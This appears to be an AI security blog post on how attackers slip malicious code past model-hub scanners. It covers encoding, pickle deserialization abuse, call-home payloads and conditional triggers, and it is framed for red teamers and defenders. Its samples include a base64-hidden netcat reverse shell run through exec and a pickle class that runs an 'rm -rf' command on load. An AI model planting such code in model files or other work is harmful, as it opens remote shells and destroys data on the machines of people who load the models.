29.1.3 Verification bypass techniques

2025.10.06.
AI Security Blog

Model hubs are not naive; they employ automated scanners to detect malicious code within uploaded model artifacts. These scanners look for suspicious patterns, known malicious function calls, and unsafe file formats. An attacker’s success, therefore, often hinges not on simply hiding a payload, but on outsmarting the verification process itself. Bypassing these checks is a critical step in a successful supply chain attack.

The core challenge for defenders is the gap between static analysis (what the code *looks like* at rest) and dynamic behavior (what the code *does* when executed). Attackers exploit this gap relentlessly.

Kapcsolati űrlap - EN

Do you have a question about AI Security? Reach out to us here:

Threat Scenario: The Time-Delayed Payload

An attacker uploads a seemingly benign model to a public repository. The model’s code and its serialized `pickle` file pass all automated scans. There are no calls to `os.system` or `subprocess.run`. However, embedded within a tensor’s metadata is a base64-encoded string. The model’s loading script is crafted to read this metadata, decode it, and execute the result *only after* it has been loaded into memory on a victim’s machine. The scanner sees data; the victim’s machine runs code.

Static Analysis Evasion Techniques

Static scanners parse files without executing them. They are fast and can catch obvious threats, but they are vulnerable to techniques that obscure the payload’s true nature.

Obfuscation and Encoding

This is the most fundamental bypass method. By encoding or encrypting the malicious payload, you can make it appear as harmless data to a scanner. The model’s legitimate loading code then acts as the de-obfuscator and executor.

Common methods include:

  • Base64/Hex Encoding: Simple to implement and effective against scanners searching for specific string literals like “subprocess” or “socket”.
  • String Concatenation/Manipulation: Building malicious commands from smaller, benign-looking strings can evade simple pattern matching. For example, building the string 'os.system' from 'os.' + 'system'.
  • Custom Ciphers: Using a simple XOR cipher or a custom encryption algorithm can render the payload unreadable to anything but the model’s own loader script.
# Example of a base64-encoded payload in a model's config
import base64
import os

# This string looks like harmless data to a static scanner
encoded_payload = "aW1wb3J0IG9zO29zLnN5c3RlbSgnbmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjEwLjUgNDQ0NCcp"

# The model's loading script decodes and executes it at runtime
decoded_script = base64.b64decode(encoded_payload).decode('utf-8')
exec(decoded_script)

Sophisticated Pickle Deserialization Abuse

While many scanners look for `pickle` files, they often search for simple, known exploits. A sophisticated attacker can craft a `pickle` payload that is much harder to detect. The `__reduce__` magic method in Python is the primary vehicle for this attack. It allows an object to specify exactly what function should be called with what arguments to rebuild it during deserialization.

Warning: The following code is for educational purposes only. Unpickling data from an untrusted source is extremely dangerous and can lead to arbitrary code execution.

# A malicious class designed to execute code when unpickled
import os
import pickle

class MaliciousPickle:
    def __reduce__(self):
        # This tuple tells pickle to call os.system with the specified command
        command = ('rm -rf /tmp/important_file')
        return (os.system, (command,))

# The attacker pickles an instance of this class
pickled_data = pickle.dumps(MaliciousPickle())

# On the victim's machine, loading this file triggers the command
# pickle.loads(pickled_data) 

A scanner might flag `os.system`, but an attacker could use a less obvious function or build the function call dynamically, making static detection significantly more challenging.

Dynamic Execution and Runtime Attacks

These techniques focus on executing malicious code *after* the model has been scanned and loaded. The initial model package is clean, but it contains a trigger that fetches and runs the real payload from an external source.

Remote Payload Fetching (Call-Home)

The model contains a small, seemingly innocuous piece of code that connects to an attacker-controlled server to download the next stage of the attack. This is highly effective because the malicious payload is never present in the files scanned by the model hub.

The diagram below illustrates this “call-home” attack flow.

Diagram of a Dynamic Payload Execution Attack Attacker Model Hub Victim System Attacker C2 (Command & Control) 1. Uploads “clean” model with trigger 3. Downloads verified model 2. Scans & Approves Scan OK 4. Model runs, trigger fires “Call-Home” for payload 5. Malicious payload delivered & executed

Exploiting Custom Operators and Code

Many models, especially in frameworks like PyTorch or TensorFlow, allow for custom code (e.g., in `model.py`). This code is executed when the model is loaded. An attacker can embed logic here that appears benign but performs a malicious action under specific runtime conditions—for instance, checking the system date or the presence of a certain file before activating a payload.

Summary of Bypass Techniques

As a red teamer, your goal is to emulate these techniques to test an organization’s model ingestion and security pipeline. The following table provides a quick reference.

Technique Mechanism Detection Difficulty Common Target Files
Obfuscation & Encoding Hides malicious strings (e.g., commands, IPs) as data within code or configuration files. Medium. Can be defeated by scanners that perform de-obfuscation, but many do not. .py scripts, config.json, metadata
Pickle Abuse (`__reduce__`) Crafts a serialized object that executes arbitrary code upon deserialization. High. Requires deep inspection of the pickle bytecode, which is complex and often impractical. .pkl, .pt, .bin
Remote Payload Fetching The initial model is clean but contains code to download and execute a payload from the internet. Very High. Static analysis is ineffective. Requires runtime monitoring and network egress filtering. .py scripts, custom operators
Conditional Execution Payload is only activated if specific runtime conditions are met (e.g., specific date, user, or environment). High. The malicious logic is dormant during scanning and may never trigger in a sandbox. .py scripts, model loading code

Understanding and applying these bypass techniques is essential for accurately assessing the security posture of an AI supply chain. A defense that only stops the most obvious attacks provides a false sense of security, which is often more dangerous than no security at all.